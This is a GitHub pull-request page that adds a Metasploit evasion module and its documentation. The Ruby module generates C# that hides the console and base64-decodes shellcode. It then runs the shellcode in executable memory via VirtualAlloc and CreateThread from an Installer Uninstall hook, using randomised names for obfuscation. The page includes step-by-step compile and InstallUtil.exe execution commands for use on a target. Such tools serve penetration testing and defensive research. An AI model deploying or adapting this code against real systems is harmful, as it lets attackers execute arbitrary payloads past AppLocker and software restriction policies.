Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add evasion module applocker_evasion_install_util #11795

Merged
merged 18 commits into from Jul 23, 2019
Merged

Add evasion module applocker_evasion_install_util #11795

Show file tree
Hide file tree
Changes from 6 commits
Commits
Show all changes
18 commits
Select commit Hold shift + click to select a range
487714b
add new evasion module applocker_evasion_install_util
mikemenasi Apr 29, 2019
ee7ef7a
fix typo
NickTyrer Apr 29, 2019
38256a1
added further obfuscation to module
NickTyrer May 1, 2019
f023fb9
add further obfuscation
NickTyrer May 2, 2019
9a6d56a
fix typo
NickTyrer May 23, 2019
f6eeb7b
fix typo
NickTyrer May 23, 2019
b7221a6
addressed issues raised by @cbrnrd
NickTyrer May 26, 2019
ab20c24
fix setting mod variables
NickTyrer May 27, 2019
894d817
updated instructions function
NickTyrer May 27, 2019
73f234a
address documentation issues raised by @cbrnrd
NickTyrer May 27, 2019
4487ae7
fix formatting
NickTyrer May 27, 2019
a3b22cb
fix formatting
NickTyrer May 27, 2019
4a359f5
format
NickTyrer May 27, 2019
45db30b
increase randomness to avoid duplicates
NickTyrer Jun 7, 2019
46ebae8
implemented rubocop suggestions
NickTyrer Jun 15, 2019
b7137ea
update module flow
NickTyrer Jun 15, 2019
791da38
update instructions
NickTyrer Jun 16, 2019
5a010e1
update documentation
NickTyrer Jun 20, 2019
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Jump to
Jump to file
Failed to load files.
Diff view
Diff view
9 changes: 9 additions & 0 deletions documentation/modules/evasion/windows/applocker_evasion_install_util.md
View file
Open in desktop
@@ -0,0 +1,9 @@
## Intro

This module is designed to evade solutions such as software restriction policies and Applocker.
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

software restriction policies

this is too vague

The main vector for this bypass is to use the trusted binary InstallUtil.exe in executing user supplied code.
bcoles marked this conversation as resolved.
Show resolved Hide resolved

## Vulnerable Application

This evasion will work on all versions of Windows that include .net versions 3.5 or greater (note: ensure the selected payload matches the target os architecture).
bcoles marked this conversation as resolved.
Show resolved Hide resolved

NickTyrer marked this conversation as resolved.
Show resolved Hide resolved
121 changes: 121 additions & 0 deletions modules/evasion/windows/applocker_evasion_install_util.rb
View file
Open in desktop
@@ -0,0 +1,121 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Evasion

def initialize(info={})
super(merge_info(info,
'Name' => 'applocker_evasion_install_util',
bcoles marked this conversation as resolved.
Show resolved Hide resolved
'Description' => %q{
This module will assist you in evading Microsoft Windows Applocker and Software Restriction Policies.
This technique utilises the Microsoft signed binary InstallUtil.exe to execute user supplied code.
},
'Author' =>
[
'Nick Tyrer <@NickTyrer>', # module development
'Casey Smith', # install_util bypass research
],
'License' => MSF_LICENSE,
'Platform' => 'win',
'Arch' => [ ARCH_X86, ARCH_X64 ],
'Targets' => [ ['Microsoft Windows', {}] ]
))
NickTyrer marked this conversation as resolved.
Show resolved Hide resolved

register_options([
OptString.new('FILENAME', [true, 'Filename for the evasive file (default: install_util.txt)', 'install_util.txt'])
])
end


def build_payload
esc = Rex::Text.encode_base64(payload.encoded)
end


def instructions
<<~HEREDOC

___________________________________________________________________________________________________________________________________________
| |
| Instructions |
|___________________________________________________________________________________________________________________________________________|
| |
| 1.Copy #{datastore['FILENAME']} to the target and execute: |
| 2.x86{ |
| Compile using: C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\csc.exe /out:installutil.exe #{datastore['FILENAME']} |
| Execute using: C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\InstallUtil.exe /logfile= /LogToConsole=false /U installutil.exe |
| } |
| x64{ |
| Compile using: C:\\Windows\\Microsoft.Net\\Framework64\\v4.0.30319\\csc.exe /out:installutil.exe #{datastore['FILENAME']} |
| Execute using: C:\\Windows\\Microsoft.Net\\Framework64\\v4.0.30319\\InstallUtil.exe /logfile= /LogToConsole=false /U installutil.exe |
| } |
|___________________________________________________________________________________________________________________________________________|
HEREDOC
end
NickTyrer marked this conversation as resolved.
Show resolved Hide resolved


def install_util
esc = build_payload
moda = Rex::Text.rand_text_alpha (3)
modb = Rex::Text.rand_text_alpha (3)
modc = Rex::Text.rand_text_alpha (3)
modd = Rex::Text.rand_text_alpha (3)
mode = Rex::Text.rand_text_alpha (3)
modf = Rex::Text.rand_text_alpha (3)
modg = Rex::Text.rand_text_alpha (3)
modh = Rex::Text.rand_text_alpha (3)
modi = Rex::Text.rand_text_alpha (3)
modj = Rex::Text.rand_text_alpha (3)
bcoles marked this conversation as resolved.
Show resolved Hide resolved
<<~HEREDOC
/*
#{instructions}
bcoles marked this conversation as resolved.
Show resolved Hide resolved
*/
using System;
namespace #{Rex::Text.rand_text_alpha 3}
{
public class #{Rex::Text.rand_text_alpha 3} { public static void Main() { } }
[System.ComponentModel.RunInstaller(true)]
public class #{Rex::Text.rand_text_alpha 3} : System.Configuration.Install.Installer
{
private static Int32 #{modh}=0x1000;
private static IntPtr #{modi}=(IntPtr)0x40;
private static UInt32 #{modj} = 0xFFFFFFFF;
[System.Runtime.InteropServices.DllImport("kernel32")]
private static extern IntPtr VirtualAlloc(IntPtr a, UIntPtr s, Int32 t, IntPtr p);
[System.Runtime.InteropServices.DllImport("kernel32")]
private static extern IntPtr CreateThread(IntPtr att, UIntPtr st, IntPtr sa, IntPtr p, Int32 c, ref IntPtr id);
[System.Runtime.InteropServices.DllImport("kernel32")]
private static extern UInt32 WaitForSingleObject(IntPtr h, UInt32 ms);
[System.Runtime.InteropServices.DllImport("user32.dll")]
static extern bool ShowWindow(IntPtr #{modg}, int nCmdShow);
[System.Runtime.InteropServices.DllImport("Kernel32")]
private static extern IntPtr GetConsoleWindow();
const int #{modf} = 0;
public override void Uninstall(System.Collections.IDictionary s)
{
IntPtr #{modg};
#{modg} = GetConsoleWindow();
ShowWindow(#{modg}, #{modf});
string #{moda} = "#{esc}";
byte[] #{modb} = Convert.FromBase64String(#{moda});
byte[] #{modc} = #{modb};
IntPtr #{modd} = VirtualAlloc(IntPtr.Zero, (UIntPtr)#{modc}.Length, #{modh}, #{modi});
System.Runtime.InteropServices.Marshal.Copy(#{modc}, 0, #{modd}, #{modc}.Length);
IntPtr #{mode} = IntPtr.Zero;
WaitForSingleObject(CreateThread(#{mode}, UIntPtr.Zero, #{modd}, #{mode}, 0, ref #{mode}), #{modj});
}
}
}
HEREDOC
end


def run
file_create(install_util)
print_status("#{instructions}")
end

end